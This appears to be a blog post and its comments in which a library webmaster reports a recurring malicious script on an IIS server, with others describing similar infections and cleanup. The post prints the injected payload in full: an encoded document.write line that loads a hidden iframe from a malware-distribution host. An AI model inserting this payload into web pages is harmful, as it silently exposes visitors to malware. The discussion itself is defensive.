Malicious javascript: document.write (unescape

Some malicious javascript has been appearing on the website of the library I work at:

document.write(unescape(‘%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%6D%6E%39%36%2E%64%6E%73%2E%67%65%6E%64%69%73%74%72%2E%69%6E%66%6F%2F%71%75%61%6C%69%74%79%74%65%73%74%2F%22%20%77%69%64%74%68%3D%30%20%68%65%69%67%68%74%3D%30%3E%3C%2F%69%66%72%61%6D%65%3E’));

this translates to:

iframe src=”http://mn96.dns.gendistr.info/qualitytest/” height=”0″ width=”0″

The website attempts to offer a virus disguised as ad protection software.  I can delete the code but it reappears (likely if/when the server is rebooted).  The code goes deep enough to appear in the iisstart.asp, localstart.asp, and browser_detect.asp.   Since I’m technically only the webmaster (for a new webpage that isn’t even up yet, don’t ask, I don’t manage the servers or other hardware) with exactly 0 experience with IIS (we have a consultant for that) I’m not sure where to go from here.

We’re running IIS 5.0 and I, for the life of me, can’t figure what item (if any) allows the replication of the code. Any help would be much appreciated.

P.S.:  To make matters worse the wwwroot folder is clogged with sh*ttons of legacy files that no-one needs/uses.

Advertisements

13 thoughts on “Malicious javascript: document.write (unescape

  1. Seems u need a got a trojan virus. Try search McAfee Site Advisor for iframe trojan or something like that…. Or better try an Apache server it has a high security.

  2. Yeah, we figure the same thing. Except Trend Micro (House Call, and the Enterprise stuff) can’t find a damned thing and I have yet to find any solutions online. Indeed, Apache is quality (I run xampp locally as a test server), but I doubt we’ll move to it. Furthermore even those discussions on the obfuscated JavaScript iframe hacks that I can find don’t mention anything about the code replicating on a server reboot, and the major appearance of the hack (ca. July ’07) indicated that it was directed at index files, not the entire root folder (and every bit of web related code there, .js .htm(l), .asp files).

  3. I’m having the same problems on some sites I’ve designed. I have no clue how it’s getting there or how to make it stop. The sites I had it on was hosted with Apache.

    1. Unfortunately, we never really solved the problem. We had a script that would copy clean files over the infected ones every time the server rebooted. Our server ended up dying a week or two ago so the problem is now moot.

  4. my sites with IXWebhosting company, they are infected too. I chatted with the help desk, they asked me to open a ticket 😦

    I cleaned them manually rather that waiting for them. I hope they have anti viruses installed in there system.

    1. It is a tenacious little pain in the ass. We never really solved it/removed it outright but our server ended up dying and we got a new one…that certainly solved the problem.

  5. AnswersJunkie

    Today I noticed that one of my WordPress sites had this type of code placed into the header.php file. I downloaded the entire site and of course it was also located in the cache folder. I haven’t had problems with my sites for several months and I have no idea how this would happen..especially in a file that I don’t change. So right now I’m reading up on how to harden the security on WordPress sites.

    The last time this happened, my web host told me that I should have contacted them when I found the problem, but I had already started removing the code manually.

    I’m on an apache server at Hostgator.

  6. skywulf

    Got this in an email from admin@careerbuilder.com offering me a job. It was attached as a .php file. Norton didn’t catch it, but I looked at the code just to make sure. The first google search of “document.write unescape” brought me here. Thanks Mike for posting this and keeping my 2-year long malware-free streak safe!

  7. CbSiteSecurity

    Thank you for helping spread a word of caution about these types of spoof messages! We recommend such messages be disregarded and any current or future correspondence attempts related to the message be ignored.

    Do you mind forwarding a copy of the email in question to us? We would like to review the emails you’ve received.

    To forward the emails or for more information about Online Fraud, we do offer a Fraud Page for Jobseekers: http://www.careerbuilder.com/JobSeeker/Info/Fraud.aspx

    Thank you.
    CareerBuilder’s Trust and Site Security Team
    @CBSiteSecurity

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s